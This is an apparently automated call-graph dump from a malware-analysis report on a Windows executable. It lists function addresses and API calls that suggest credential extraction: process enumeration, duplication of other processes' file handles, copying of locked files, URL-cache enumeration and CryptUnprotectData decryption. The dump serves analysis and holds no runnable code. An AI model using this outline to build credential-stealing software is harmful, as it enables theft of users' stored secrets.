38459 409d1f 6 API calls 38458->38459 38460 4088d0 38459->38460 38461 40b2cc 27 API calls 38460->38461 38462 4088df 38461->38462 38463 409d1f 6 API calls 38462->38463 38464 4088ef 38463->38464 38465 40b2cc 27 API calls 38464->38465 38466 4088fe 38465->38466 38467 409d1f 6 API calls 38466->38467 38468 40890e 38467->38468 38469 40b2cc 27 API calls 38468->38469 38470 40891d 38469->38470 38480 408953 38480->38205 38499 40b633 free 38498->38499 38500 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38499->38500 38501 413f00 Process32NextW 38500->38501 38502 413da5 OpenProcess 38501->38502 38503 413f17 CloseHandle 38501->38503 38504 413df3 memset 38502->38504 38508 413eb0 38502->38508 38503->38244 39593 413f27 38504->39593 38506 413ebf free 38506->38508 38507 413e1f 38510 413e37 GetModuleHandleW 38507->38510 39598 413959 38507->39598 39614 413ca4 38507->39614 38508->38501 38508->38506 38509 4099f4 3 API calls 38508->38509 38509->38508 38510->38507 38512 413e46 GetProcAddress 38510->38512 38512->38507 38514 413ea2 CloseHandle 38514->38508 38516 414c2e 17 API calls 38515->38516 38517 403eb7 38516->38517 38518 414c2e 17 API calls 38517->38518 38519 403ec5 38518->38519 38520 409d1f 6 API calls 38519->38520 38521 403ee2 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 403efd 38522->38523 38524 409d1f 6 API calls 38523->38524 38525 403f15 38524->38525 38526 403af5 20 API calls 38525->38526 38527 403f29 38526->38527 38528 403af5 20 API calls 38527->38528 38529 403f3a 38528->38529 38530 40414f 33 API calls 38529->38530 38536 403f4f 38530->38536 38531 403faf 39628 40b1ab free free 38531->39628 38533 403f5b memset 38533->38536 38534 403fb7 38534->38190 38535 4099c6 2 API calls 38535->38536 38536->38531 38536->38533 38536->38535 38537 40a8ab 9 API calls 38536->38537 38537->38536 38539 414c2e 17 API calls 38538->38539 38540 403d26 38539->38540 38541 414c2e 17 API calls 38540->38541 38542 403d34 38541->38542 38543 409d1f 6 API calls 38542->38543 38544 403d51 38543->38544 38545 409d1f 6 API calls 38544->38545 38546 403d6c 38545->38546 38547 409d1f 6 API calls 38546->38547 38548 403d84 38547->38548 38549 403af5 20 API calls 38548->38549 38550 403d98 38549->38550 38551 403af5 20 API calls 38550->38551 38552 403da9 38551->38552 38553 40414f 33 API calls 38552->38553 38559 403dbe 38553->38559 38554 403e1e 39629 40b1ab free free 38554->39629 38556 403dca memset 38556->38559 38557 403e26 38557->38193 38558 4099c6 2 API calls 38558->38559 38559->38554 38559->38556 38559->38558 38560 40a8ab 9 API calls 38559->38560 38560->38559 38562 414b81 9 API calls 38561->38562 38563 414c40 38562->38563 38564 414c73 memset 38563->38564 39630 409cea 38563->39630 38566 414c94 38564->38566 39633 414592 RegOpenKeyExW 38566->39633 38568 414c64 SHGetSpecialFolderPathW 38570 414d0b 38568->38570 38570->38185 38571 414cf4 wcscpy 38571->38570 38572 414cc1 38572->38571 39634 414bb0 wcscpy 38572->39634 38574 414cd2 39635 4145ac RegQueryValueExW 38574->39635 38576 414ce9 RegCloseKey 38576->38571 38578 409d62 38577->38578 38579 409d43 wcscpy 38577->38579 38578->38224 38580 409719 2 API calls 38579->38580 38581 409d51 wcscat 38580->38581 38581->38578 38583 40aebe FindClose 38582->38583 38584 40ae21 38583->38584 38585 4099c6 2 API calls 38584->38585 38586 40ae35 38585->38586 38587 409d1f 6 API calls 38586->38587 38588 40ae49 38587->38588 38588->38289 38590 40ade0 38589->38590 38591 40ae0f 38589->38591 38590->38591 38592 40ade7 wcscmp 38590->38592 38591->38289 38592->38591 38593 40adfe wcscmp 38592->38593 38593->38591 38595 40ae18 9 API calls 38594->38595 38597 4453c4 38595->38597 38596 40ae51 9 API calls 38596->38597 38597->38596 38598 4453f3 38597->38598 38599 40add4 2 API calls 38597->38599 38602 445403 254 API calls 38597->38602 38600 40aebe FindClose 38598->38600 38599->38597 38601 4453fe 38600->38601 38601->38289 38602->38597 38604 40ae7b FindNextFileW 38603->38604 38605 40ae5c FindFirstFileW 38603->38605 38606 40ae94 38604->38606 38607 40ae8f 38604->38607 38605->38606 38609 40aeb6 38606->38609 38610 409d1f 6 API calls 38606->38610 38608 40aebe FindClose 38607->38608 38608->38606 38609->38289 38610->38609 38611->38173 38612->38154 38613->38247 38614->38231 38615->38231 38616->38262 38618 409c89 38617->38618 38618->38285 38619->38314 38621 413d39 38620->38621 38622 413d2f FreeLibrary 38620->38622 38623 40b633 free 38621->38623 38622->38621 38624 413d42 38623->38624 38625 40b633 free 38624->38625 38626 413d4a 38625->38626 38626->38146 38627->38153 38628->38141 38629->38217 38631 44db70 38630->38631 38632 40b6fc memset 38631->38632 38633 409c70 2 API calls 38632->38633 38634 40b732 wcsrchr 38633->38634 38635 40b743 38634->38635 38636 40b746 memset 38634->38636 38635->38636 38637 40b2cc 27 API calls 38636->38637 38638 40b76f 38637->38638 38639 409d1f 6 API calls 38638->38639 38640 40b783 38639->38640 39636 409b98 GetFileAttributesW 38640->39636 38642 40b792 38643 40b7c2 38642->38643 38644 409c70 2 API calls 38642->38644 39637 40bb98 38643->39637 38646 40b7a5 38644->38646 38650 40b2cc 27 API calls 38646->38650 38648 40b837 CloseHandle 38652 40b83e memset 38648->38652 38649 40b817 38651 409a45 3 API calls 38649->38651 38653 40b7b2 38650->38653 38654 40b827 CopyFileW 38651->38654 39670 40a6e6 WideCharToMultiByte 38652->39670 38656 409d1f 6 API calls 38653->38656 38654->38652 38656->38643 38657 40b866 38658 444432 121 API calls 38657->38658 38659 40b879 38658->38659 38660 40bad5 38659->38660 38661 40b273 27 API calls 38659->38661 38662 40baeb 38660->38662 38663 40bade DeleteFileW 38660->38663 38664 40b89a 38661->38664 38665 40b04b ??3@YAXPAX 38662->38665 38663->38662 38667 438552 134 API calls 38664->38667 38666 40baf3 38665->38666 38666->38143 38668 40b8a4 38667->38668 38669 40bacd 38668->38669 38671 4251c4 137 API calls 38668->38671 38670 443d90 111 API calls 38669->38670 38670->38660 38693 40b8b8 38671->38693 38672 40bac6 39680 424f26 123 API calls 38672->39680 38673 40b8bd memset 39671 425413 17 API calls 38673->39671 38676 425413 17 API calls 38676->38693 38679 40a71b MultiByteToWideChar 38679->38693 38682 40b9b5 memcmp 38682->38693 38683 4099c6 2 API calls 38683->38693 38684 404423 38 API calls 38684->38693 38687 4251c4 137 API calls 38687->38693 38688 40bb3e memset memcpy 39681 40a734 MultiByteToWideChar 38688->39681 38690 40bb88 LocalFree 38690->38693 38693->38672 38693->38673 38693->38676 38693->38679 38693->38682 38693->38683 38693->38684 38693->38687 38693->38688 38694 40ba5f memcmp 38693->38694 38695 40a734 MultiByteToWideChar 38693->38695 39672 4253ef 16 API calls 38693->39672 39673 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38693->39673 39674 4253af 17 API calls 38693->39674 39675 4253cf 17 API calls 38693->39675 39676 447280 memset 38693->39676 39677 447960 memset memcpy memcpy memcpy 38693->39677 39678 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38693->39678 39679 447920 memcpy memcpy memcpy 38693->39679 38694->38693 38695->38693 38696->38220 38698 40aed1 38697->38698 38699 40aec7 FindClose 38697->38699 38698->38157 38699->38698 38701 4099d7 38700->38701 38702 4099da memcpy 38700->38702 38701->38702 38702->38204 38704 40b2cc 27 API calls 38703->38704 38705 44543f 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 44544f 38706->38707 39768 409b98 GetFileAttributesW 38707->39768 38709 44545e 38710 445476 38709->38710 38711 40b6ef 253 API calls 38709->38711 38712 40b2cc 27 API calls 38710->38712 38711->38710 38713 445482 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 445492 38714->38715 39769 409b98 GetFileAttributesW 38715->39769 38717 4454a1 38718 4454b9 38717->38718 38719 40b6ef 253 API calls 38717->38719 38718->38229 38719->38718 38720->38228 38721->38252 38722->38255 38723->38292 38724->38274 38725->38321 38726->38321 38727->38303 38728->38333 38729->38335 38730->38337 38732 414c2e 17 API calls 38731->38732 38733 40c2ae 38732->38733 38803 40c1d3 38733->38803 38738 40c3be 38755 40a8ab 38738->38755 38739 40afcf 2 API calls 38740 40c2fd FindFirstUrlCacheEntryW 38739->38740 38741 40c3b6 38740->38741 38742 40c31e wcschr 38740->38742 38743 40b04b ??3@YAXPAX 38741->38743 38744 40c331 38742->38744 38745 40c35e FindNextUrlCacheEntryW 38742->38745 38743->38738 38747 40a8ab 9 API calls 38744->38747 38745->38742 38746 40c373 GetLastError 38745->38746 38748 40c3ad FindCloseUrlCache 38746->38748 38749 40c37e 38746->38749 38750 40c33e wcschr 38747->38750 38748->38741 38751 40afcf 2 API calls 38749->38751 38750->38745 38752 40c34f 38750->38752 38753 40c391 FindNextUrlCacheEntryW 38751->38753 38754 40a8ab 9 API calls 38752->38754 38753->38742 38753->38748 38754->38745 38958 40a97a 38755->38958 38758 40a8cc 38758->38344 38759 40a8d0 7 API calls 38759->38758 38963 40b1ab free free 38760->38963 38762 40c3dd 38763 40b2cc 27 API calls 38762->38763 38764 40c3e7 38763->38764 38964 414592 RegOpenKeyExW 38764->38964 38766 40c3f4 38767 40c50e 38766->38767 38768 40c3ff 38766->38768 38782 405337 38767->38782 38769 40a9ce 4 API calls 38768->38769 38770 40c418 memset 38769->38770 38965 40aa1d 38770->38965 38773 40c471 38775 40c47a _wcsupr 38773->38775 38774 40c505 RegCloseKey 38774->38767 38776 40a8d0 7 API calls 38775->38776 38777 40c498 38776->38777 38778 40a8d0 7 API calls 38777->38778 38779 40c4ac memset 38778->38779 38780 40aa1d 38779->38780 38781 40c4e4 RegEnumValueW 38780->38781 38781->38774 38781->38775 38967 405220 38782->38967 38786 4099c6 2 API calls 38785->38786 38787 40a714 _wcslwr 38786->38787 38788 40c634 38787->38788 39024 405361 38788->39024 38791 40c65c wcslen 39027 4053b6 39 API calls 38791->39027 38792 40c71d wcslen 38792->38358 38794 40c677 38795 40c713 38794->38795 39028 40538b 39 API calls 38794->39028 39030 4053df 39 API calls 38795->39030 38798 40c6a5 38798->38795 38799 40c6a9 memset 38798->38799 38800 40c6d3 38799->38800 39029 40c589 44 API calls 38800->39029 38802->38351 38804 40ae18 9 API calls 38803->38804 38810 40c210 38804->38810 38805 40ae51 9 API calls 38805->38810 38806 40c264 38807 40aebe FindClose 38806->38807 38809 40c26f 38807->38809 38808 40add4 2 API calls 38808->38810 38815 40e5ed memset memset 38809->38815 38810->38805 38810->38806 38810->38808 38811 40c231 _wcsicmp 38810->38811 38812 40c1d3 35 API calls 38810->38812 38811->38810 38813 40c248 38811->38813 38812->38810 38828 40c084 22 API calls 38813->38828 38816 414c2e 17 API calls 38815->38816 38817 40e63f 38816->38817 38818 409d1f 6 API calls 38817->38818 38819 40e658 38818->38819 38829 409b98 GetFileAttributesW 38819->38829 38821 40e667 38823 409d1f 6 API calls 38821->38823 38825 40e680 38821->38825 38823->38825 38824 40e68f 38826 40c2d8 38824->38826 38831 40e4b2 38824->38831 38830 409b98 GetFileAttributesW 38825->38830 38826->38738 38826->38739 38828->38810 38829->38821 38830->38824 38852 40e01e 38831->38852 38833 40e593 38834 40e5b0 38833->38834 38835 40e59c DeleteFileW 38833->38835 38836 40b04b ??3@YAXPAX 38834->38836 38835->38834 38838 40e5bb 38836->38838 38837 40e521 38837->38833 38875 40e175 38837->38875 38840 40e5c4 CloseHandle 38838->38840 38841 40e5cc 38838->38841 38840->38841 38843 40b633 free 38841->38843 38842 40e573 38845 40e584 38842->38845 38846 40e57c CloseHandle 38842->38846 38844 40e5db 38843->38844 38849 40b633 free 38844->38849 38896 40b1ab free free 38845->38896 38846->38845 38848 40e540 38848->38842 38895 40e2ab 30 API calls 38848->38895 38850 40e5e3 38849->38850 38850->38826 38897 406214 38852->38897 38855 40e16b 38855->38837 38858 40afcf 2 API calls 38859 40e08d OpenProcess 38858->38859 38860 40e0a4 GetCurrentProcess DuplicateHandle 38859->38860 38864 40e152 38859->38864 38861 40e0d0 GetFileSize 38860->38861 38862 40e14a CloseHandle 38860->38862 38933 409a45 GetTempPathW 38861->38933 38862->38864 38863 40e160 38867 40b04b ??3@YAXPAX 38863->38867 38864->38863 38866 406214 22 API calls 38864->38866 38866->38863 38867->38855 38868 40e0ea 38936 4096dc CreateFileW 38868->38936 38870 40e0f1 CreateFileMappingW 38871 40e140 CloseHandle CloseHandle 38870->38871 38872 40e10b MapViewOfFile 38870->38872 38871->38862 38873 40e13b CloseHandle 38872->38873 38874 40e11f WriteFile UnmapViewOfFile 38872->38874 38873->38871 38874->38873 38876 40e18c 38875->38876 38937 406b90 38876->38937 38879 40e1a7 memset 38885 40e1e8 38879->38885 38880 40e299 38947 4069a3 38880->38947 38886 40e283 38885->38886 38887 40dd50 _wcsicmp 38885->38887 38893 40e244 _snwprintf 38885->38893 38954 406e8f 13 API calls 38885->38954 38955 40742e 8 API calls 38885->38955 38956 40aae3 wcslen wcslen _memicmp 38885->38956 38957 406b53 SetFilePointerEx ReadFile 38885->38957 38888 40e291 38886->38888 38889 40e288 free 38886->38889 38887->38885 38890 40aa04 free 38888->38890 38889->38888 38890->38880 38894 40a8d0 7 API calls 38893->38894 38894->38885 38895->38848 38896->38833 38898 406294 CloseHandle 38897->38898 38899 406224 38898->38899 38900 4096c3 CreateFileW 38899->38900 38901 40622d 38900->38901 38902 406281 GetLastError 38901->38902 38904 40a2ef ReadFile 38901->38904 38903 40625a 38902->38903 38903->38855 38908 40dd85 memset 38903->38908 38905 406244 38904->38905 38905->38902 38906 40624b 38905->38906 38906->38903 38907 406777 19 API calls 38906->38907 38907->38903 38909 409bca GetModuleFileNameW 38908->38909 38910 40ddbe CreateFileW 38909->38910 38913 40ddf1 38910->38913 38911 40afcf ??2@YAPAXI ??3@YAXPAX 38911->38913 38912 41352f 9 API calls 38912->38913 38913->38911 38913->38912 38914 40de0b NtQuerySystemInformation 38913->38914 38915 40de3b CloseHandle GetCurrentProcessId 38913->38915 38914->38913 38916 40de54 38915->38916 38917 413d4c 46 API calls 38916->38917 38926 40de88 38917->38926 38918 40e00c 38919 413d29 free FreeLibrary 38918->38919 38920 40e014 38919->38920 38920->38855 38920->38858 38921 40dea9 _wcsicmp 38922 40dee7 OpenProcess 38921->38922 38923 40debd _wcsicmp 38921->38923 38922->38926 38923->38922 38924 40ded0 _wcsicmp 38923->38924 38924->38922 38924->38926 38925 40dfef CloseHandle 38925->38926 38926->38918 38926->38921 38926->38925 38927 40df78 38926->38927 38928 40df23 GetCurrentProcess DuplicateHandle 38926->38928 38931 40df8f CloseHandle 38926->38931 38927->38925 38927->38931 38932 40dfae _wcsicmp 38927->38932 38928->38926 38929 40df4c memset 38928->38929 38930 41352f 9 API calls 38929->38930 38930->38926 38931->38927 38932->38926 38932->38927 38934 409a74 GetTempFileNameW 38933->38934 38935 409a66 GetWindowsDirectoryW 38933->38935 38934->38868 38935->38934 38936->38870 38938 406bd5 38937->38938 38941 406bad 38937->38941 38940 4066bf free malloc memcpy free free 38938->38940 38946 406c0f 38938->38946 38939 406bba _wcsicmp 38939->38938 38939->38941 38942 406be5 38940->38942 38941->38938 38941->38939 38943 40afcf ??2@YAPAXI ??3@YAXPAX 38942->38943 38942->38946 38944 406bff 38943->38944 38945 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 38944->38945 38945->38946 38946->38879 38946->38880 38948 4069c4 ??3@YAXPAX 38947->38948 38949 4069af 38948->38949 38950 40b633 free 38949->38950 38951 4069ba 38950->38951 38952 40b04b ??3@YAXPAX 38951->38952 38953 4069c2 38952->38953 38953->38848 38954->38885 38955->38885 38956->38885 38957->38885 38960 40a980 38958->38960 38959 40a8bb 38959->38758 38959->38759 38960->38959 38961 40a995 _wcsicmp 38960->38961 38962 40a99c wcscmp 38960->38962 38961->38960 38962->38960 38963->38762 38964->38766 38966 40aa23 RegEnumValueW 38965->38966 38966->38773 38966->38774 38968 405335 38967->38968 38969 40522a 38967->38969 38968->38358 38970 40b2cc 27 API calls 38969->38970 38971 405234 38970->38971 38972 40a804 8 API calls 38971->38972 38973 40523a 38972->38973 39012 40b273 38973->39012 38975 405248 _mbscpy _mbscat GetProcAddress 38976 40b273 27 API calls 38975->38976 38977 405279 38976->38977 39015 405211 GetProcAddress 38977->39015 38979 405282 38980 40b273 27 API calls 38979->38980 38981 40528f 38980->38981 39016 405211 GetProcAddress 38981->39016 38983 405298 38984 40b273 27 API calls 38983->38984 38985 4052a5 38984->38985 39017 405211 GetProcAddress 38985->39017 38987 4052ae 38988 40b273 27 API calls 38987->38988 38989 4052bb 38988->38989 39018 405211 GetProcAddress 38989->39018 38991 4052c4 38992 40b273 27 API calls 38991->38992 38993 4052d1 38992->38993 39019 405211 GetProcAddress 38993->39019 38995 4052da 38996 40b273 27 API calls 38995->38996 38997 4052e7 38996->38997 39020 405211 GetProcAddress 38997->39020 38999 4052f0 39000 40b273 27 API calls 38999->39000 39001 4052fd 39000->39001 39021 405211 GetProcAddress 39001->39021 39003 405306 39004 40b273 27 API calls 39003->39004 39005 405313 39004->39005 39022 405211 GetProcAddress 39005->39022 39007 40531c 39013 40b58d 27 API calls 39012->39013 39014 40b18c 39013->39014 39014->38975 39015->38979 39016->38983 39017->38987 39018->38991 39019->38995 39020->38999 39021->39003 39022->39007 39025 405220 39 API calls 39024->39025 39026 405369 39025->39026 39026->38791 39026->38792 39027->38794 39028->38798 39029->38795 39030->38792 39032 40440c FreeLibrary 39031->39032 39033 40436d 39032->39033 39034 40a804 8 API calls 39033->39034 39035 404377 39034->39035 39036 404383 39035->39036 39037 404405 39035->39037 39038 40b273 27 API calls 39036->39038 39037->38364 39037->38365 39037->38369 39039 40438d GetProcAddress 39038->39039 39040 40b273 27 API calls 39039->39040 39041 4043a7 GetProcAddress 39040->39041 39042 40b273 27 API calls 39041->39042 39043 4043ba GetProcAddress 39042->39043 39044 40b273 27 API calls 39043->39044 39045 4043ce GetProcAddress 39044->39045 39046 40b273 27 API calls 39045->39046 39047 4043e2 GetProcAddress 39046->39047 39048 4043f1 39047->39048 39049 4043f7 39048->39049 39050 40440c FreeLibrary 39048->39050 39049->39037 39050->39037 39052 404413 FreeLibrary 39051->39052 39053 40441e 39051->39053 39052->39053 39053->38380 39054->38377 39056 40447e 39055->39056 39057 40442e 39055->39057 39058 404485 CryptUnprotectData 39056->39058 39059 40449c 39056->39059 39060 40b2cc 27 API calls 39057->39060 39058->39059 39059->38377 39061 404438 39060->39061 39062 40a804 8 API calls 39061->39062 39063 40443e 39062->39063 39064 404445 39063->39064 39065 404467 39063->39065 39066 40b273 27 API calls 39064->39066 39065->39056 39067 404475 FreeLibrary 39065->39067 39068 40444f GetProcAddress 39066->39068 39067->39056 39068->39065 39069 404460 39068->39069 39069->39065 39071 4135f6 39070->39071 39072 4135eb FreeLibrary 39070->39072 39071->38383 39072->39071 39074 4449c4 39073->39074 39075 444a52 39073->39075 39076 40b2cc 27 API calls 39074->39076 39075->38400 39075->38401 39077 4449cb 39076->39077 39078 40a804 8 API calls 39077->39078 39079 4449d1 39078->39079 39080 40b273 27 API calls 39079->39080 39081 4449dc GetProcAddress 39080->39081 39082 40b273 27 API calls 39081->39082 39083 4449f3 GetProcAddress 39082->39083 39084 40b273 27 API calls 39083->39084 39085 444a04 GetProcAddress 39084->39085 39086 40b273 27 API calls 39085->39086 39087 444a15 GetProcAddress 39086->39087 39094->38411 39095->38411 39096->38411 39097->38411 39098->38402 39100 403a29 39099->39100 39114 403bed memset memset 39100->39114 39102 403a2f 39103 403ae7 39102->39103 39104 403a3f memset 39102->39104 39107 409b98 GetFileAttributesW 39102->39107 39108 40a8d0 7 API calls 39102->39108 39109 409d1f 6 API calls 39102->39109 39127 40b1ab free free 39103->39127 39104->39102 39106 403aef 39106->38418 39107->39102 39108->39102 39109->39102 39111 40a051 GetFileTime CloseHandle 39110->39111 39112 4039ca CompareFileTime 39110->39112 39111->39112 39112->38418 39113->38417 39115 414c2e 17 API calls 39114->39115 39116 403c38 39115->39116 39117 409719 2 API calls 39116->39117 39118 403c3f wcscat 39117->39118 39119 414c2e 17 API calls 39118->39119 39120 403c61 39119->39120 39121 409719 2 API calls 39120->39121 39122 403c68 wcscat 39121->39122 39128 403af5 39122->39128 39125 403af5 20 API calls 39126 403c95 39125->39126 39126->39102 39127->39106 39129 403b02 39128->39129 39130 40ae18 9 API calls 39129->39130 39138 403b37 39130->39138 39131 403bdb 39132 40aebe FindClose 39131->39132 39133 403be6 39132->39133 39133->39125 39134 40ae18 9 API calls 39134->39138 39135 40ae51 9 API calls 39135->39138 39136 40add4 wcscmp wcscmp 39136->39138 39137 40aebe FindClose 39137->39138 39138->39131 39138->39134 39138->39135 39138->39136 39138->39137 39139 40a8d0 7 API calls 39138->39139 39139->39138 39141 409d1f 6 API calls 39140->39141 39142 404190 39141->39142 39155 409b98 GetFileAttributesW 39142->39155 39144 40419c 39145 4041a7 6 API calls 39144->39145 39146 40435c 39144->39146 39148 40424f 39145->39148 39146->38445 39148->39146 39149 40425e memset 39148->39149 39151 409d1f 6 API calls 39148->39151 39152 40a8ab 9 API calls 39148->39152 39156 414842 39148->39156 39149->39148 39150 404296 wcscpy 39149->39150 39150->39148 39151->39148 39153 4042b6 memset memset _snwprintf wcscpy 39152->39153 39153->39148 39154->38443 39155->39144 39159 41443e 39156->39159 39158 414866 39158->39148 39160 41444b 39159->39160 39161 414451 39160->39161 39162 4144a3 GetPrivateProfileStringW 39160->39162 39163 414491 39161->39163 39164 414455 wcschr 39161->39164 39162->39158 39165 414495 WritePrivateProfileStringW 39163->39165 39164->39163 39166 414463 _snwprintf 39164->39166 39165->39158 39166->39165 39167->38449 39169 40b2cc 27 API calls 39168->39169 39170 409615 39169->39170 39171 409d1f 6 API calls 39170->39171 39172 409625 39171->39172 39197 409b98 GetFileAttributesW 39172->39197 39174 409634 39175 409648 39174->39175 39198 4091b8 memset 39174->39198 39177 40b2cc 27 API calls 39175->39177 39179 408801 39175->39179 39178 40965d 39177->39178 39180 409d1f 6 API calls 39178->39180 39179->38452 39179->38480 39181 40966d 39180->39181 39250 409b98 GetFileAttributesW 39181->39250 39183 40967c 39183->39179 39184 409681 39183->39184 39251 409529 72 API calls 39184->39251 39186 409690 39186->39179 39197->39174 39252 40a6e6 WideCharToMultiByte 39198->39252 39200 409202 39253 444432 39200->39253 39203 40b273 27 API calls 39204 409236 39203->39204 39299 438552 39204->39299 39207 409383 39230 40951d 39230->39175 39250->39183 39251->39186 39252->39200 39349 4438b5 39253->39349 39255 44444c 39256 409215 39255->39256 39363 415a6d 39255->39363 39256->39203 39256->39230 39258 4442e6 11 API calls 39260 44469e 39258->39260 39259 444486 39261 4444b9 memcpy 39259->39261 39298 4444a4 39259->39298 39260->39256 39263 443d90 111 API calls 39260->39263 39367 415258 39261->39367 39263->39256 39264 444524 39265 444541 39264->39265 39266 44452a 39264->39266 39370 444316 39265->39370 39267 416935 16 API calls 39266->39267 39267->39298 39298->39258 39481 438460 39299->39481 39301 409240 39301->39207 39302 4251c4 39301->39302 39350 4438d0 39349->39350 39360 4438c9 39349->39360 39437 415378 memcpy memcpy 39350->39437 39360->39255 39364 415a77 39363->39364 39365 415a8d 39364->39365 39366 415a7e memset 39364->39366 39365->39259 39366->39365 39368 4438b5 11 API calls 39367->39368 39369 41525d 39368->39369 39369->39264 39371 444328 39370->39371 39372 444423 39371->39372 39373 44434e 39371->39373 39438 4446ea 11 API calls 39372->39438 39375 432d4e 3 API calls 39373->39375 39493 41703f 39481->39493 39483 43847a 39484 43848a 39483->39484 39485 43847e 39483->39485 39500 438270 39484->39500 39530 4446ea 11 API calls 39485->39530 39489 438488 39489->39301 39494 417044 39493->39494 39495 41705c 39493->39495 39497 416760 11 API calls 39494->39497 39499 417055 39494->39499 39496 417075 39495->39496 39498 41707a 11 API calls 39495->39498 39496->39483 39497->39499 39498->39494 39499->39483 39501 415a91 memset 39500->39501 39502 43828d 39501->39502 39504 438341 39502->39504 39530->39489 39620 413f4f 39593->39620 39596 413f37 K32GetModuleFileNameExW 39597 413f4a 39596->39597 39597->38507 39599 413969 wcscpy 39598->39599 39600 41396c wcschr 39598->39600 39610 413a3a 39599->39610 39600->39599 39602 41398e 39600->39602 39625 4097f7 wcslen wcslen _memicmp 39602->39625 39604 41399a 39605 4139a4 memset 39604->39605 39606 4139e6 39604->39606 39626 409dd5 GetWindowsDirectoryW wcscpy 39605->39626 39608 413a31 wcscpy 39606->39608 39609 4139ec memset 39606->39609 39608->39610 39627 409dd5 GetWindowsDirectoryW wcscpy 39609->39627 39610->38507 39611 4139c9 wcscpy wcscat 39611->39610 39613 413a11 memcpy wcscat 39613->39610 39615 413cb0 GetModuleHandleW 39614->39615 39616 413cda 39614->39616 39615->39616 39619 413cbf GetProcAddress 39615->39619 39617 413ce3 GetProcessTimes 39616->39617 39618 413cf6 39616->39618 39617->38514 39618->38514 39619->39616 39621 413f2f 39620->39621 39622 413f54 39620->39622 39621->39596 39621->39597 39623 40a804 8 API calls 39622->39623 39624 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39623->39624 39624->39621 39625->39604 39626->39611 39627->39613 39628->38534 39629->38557 39631 409cf9 GetVersionExW 39630->39631 39632 409d0a 39630->39632 39631->39632 39632->38564 39632->38568 39633->38572 39634->38574 39635->38576 39636->38642 39638 40bba5 39637->39638 39682 40cc26 39638->39682 39641 40bd4b 39703 40cc0c 39641->39703 39646 40b2cc 27 API calls 39647 40bbef 39646->39647 39710 40ccf0 _wcsicmp 39647->39710 39649 40bbf5 39649->39641 39711 40ccb4 6 API calls 39649->39711 39651 40bc26 39652 40cf04 17 API calls 39651->39652 39653 40bc2e 39652->39653 39654 40bd43 39653->39654 39655 40b2cc 27 API calls 39653->39655 39656 40cc0c 4 API calls 39654->39656 39657 40bc40 39655->39657 39656->39641 39712 40ccf0 _wcsicmp 39657->39712 39659 40bc46 39659->39654 39660 40bc61 memset memset WideCharToMultiByte 39659->39660 39713 40103c strlen 39660->39713 39662 40bcc0 39663 40b273 27 API calls 39662->39663 39664 40bcd0 memcmp 39663->39664 39664->39654 39665 40bce2 39664->39665 39666 404423 38 API calls 39665->39666 39667 40bd10 39666->39667 39667->39654 39668 40bd3a LocalFree 39667->39668 39669 40bd1f memcpy 39667->39669 39668->39654 39669->39668 39670->38657 39671->38693 39672->38693 39673->38693 39674->38693 39675->38693 39676->38693 39677->38693 39678->38693 39679->38693 39680->38669 39681->38690 39714 4096c3 CreateFileW 39682->39714 39684 40cc34 39685 40cc3d GetFileSize 39684->39685 39693 40bbca 39684->39693 39686 40afcf 2 API calls 39685->39686 39687 40cc64 39686->39687 39715 40a2ef ReadFile 39687->39715 39689 40cc71 39716 40ab4a MultiByteToWideChar 39689->39716 39691 40cc95 CloseHandle 39692 40b04b ??3@YAXPAX 39691->39692 39692->39693 39693->39641 39694 40cf04 39693->39694 39695 40b633 free 39694->39695 39696 40cf14 39695->39696 39722 40b1ab free free 39696->39722 39698 40bbdd 39698->39641 39698->39646 39699 40cf1b 39699->39698 39700 40cfef 39699->39700 39723 40cd4b 39699->39723 39702 40cd4b 14 API calls 39700->39702 39702->39698 39704 40b633 free 39703->39704 39705 40cc15 39704->39705 39706 40aa04 free 39705->39706 39707 40cc1d 39706->39707 39767 40b1ab free free 39707->39767 39709 40b7d4 memset CreateFileW 39709->38648 39709->38649 39710->39649 39711->39651 39712->39659 39713->39662 39714->39684 39715->39689 39717 40ab6b 39716->39717 39721 40ab93 39716->39721 39718 40a9ce 4 API calls 39717->39718 39719 40ab74 39718->39719 39720 40ab7c MultiByteToWideChar 39719->39720 39720->39721 39721->39691 39722->39699 39724 40cd7b 39723->39724 39757 40aa29 6 API calls 39724->39757 39726 40cef5 39727 40aa04 free 39726->39727 39728 40cefd 39727->39728 39728->39699 39729 40cd89 39729->39726 39758 40aa29 6 API calls 39729->39758 39731 40ce1d 39759 40aa29 6 API calls 39731->39759 39733 40ce3e 39734 40ce6a 39733->39734 39760 40abb7 wcslen memmove 39733->39760 39735 40ce9f 39734->39735 39763 40abb7 wcslen memmove 39734->39763 39738 40a8d0 7 API calls 39735->39738 39741 40ceb5 39738->39741 39739 40ce56 39761 40aa71 wcslen 39739->39761 39740 40ce8b 39764 40aa71 wcslen 39740->39764 39746 40a8d0 7 API calls 39741->39746 39744 40ce5e 39762 40abb7 wcslen memmove 39744->39762 39748 40cecb 39746->39748 39747 40ce93 39765 40abb7 wcslen memmove 39747->39765 39766 40d00b malloc memcpy free free 39748->39766 39751 40cedd 39752 40aa04 free 39751->39752 39753 40cee5 39752->39753 39754 40aa04 free 39753->39754 39755 40ceed 39754->39755 39756 40aa04 free 39755->39756 39756->39726 39757->39729 39758->39731 39759->39733 39760->39739 39761->39744 39762->39734 39763->39740 39764->39747 39765->39735 39766->39751 39767->39709 39768->38709 39769->38717 40421 441819 40424 430737 40421->40424 40423 441825 40425 430756 40424->40425 40437 43076d 40424->40437 40426 430774 40425->40426 40427 43075f 40425->40427 40439 43034a memcpy 40426->40439 40438 4169a7 11 API calls 40427->40438 40430 4307ce 40432 430819 memset 40430->40432 40440 415b2c 11 API calls 40430->40440 40431 43077e 40431->40430 40435 4307fa 40431->40435 40431->40437 40432->40437 40434 4307e9 40434->40432 40434->40437 40441 4169a7 11 API calls 40435->40441 40437->40423 40438->40437 40439->40431 40440->40434 40441->40437 40442 41493c EnumResourceNamesW 39770 4415ea 39778 4304b2 39770->39778 39772 4415fe 39773 4418ea 39772->39773 39774 4418e2 39772->39774 39777 442bd4 39772->39777 39774->39773 39825 4414a9 12 API calls 39774->39825 39777->39773 39826 441409 memset 39777->39826 39827 43041c 12 API calls 39778->39827 39780 4304cd 39785 430557 39780->39785 39828 43034a 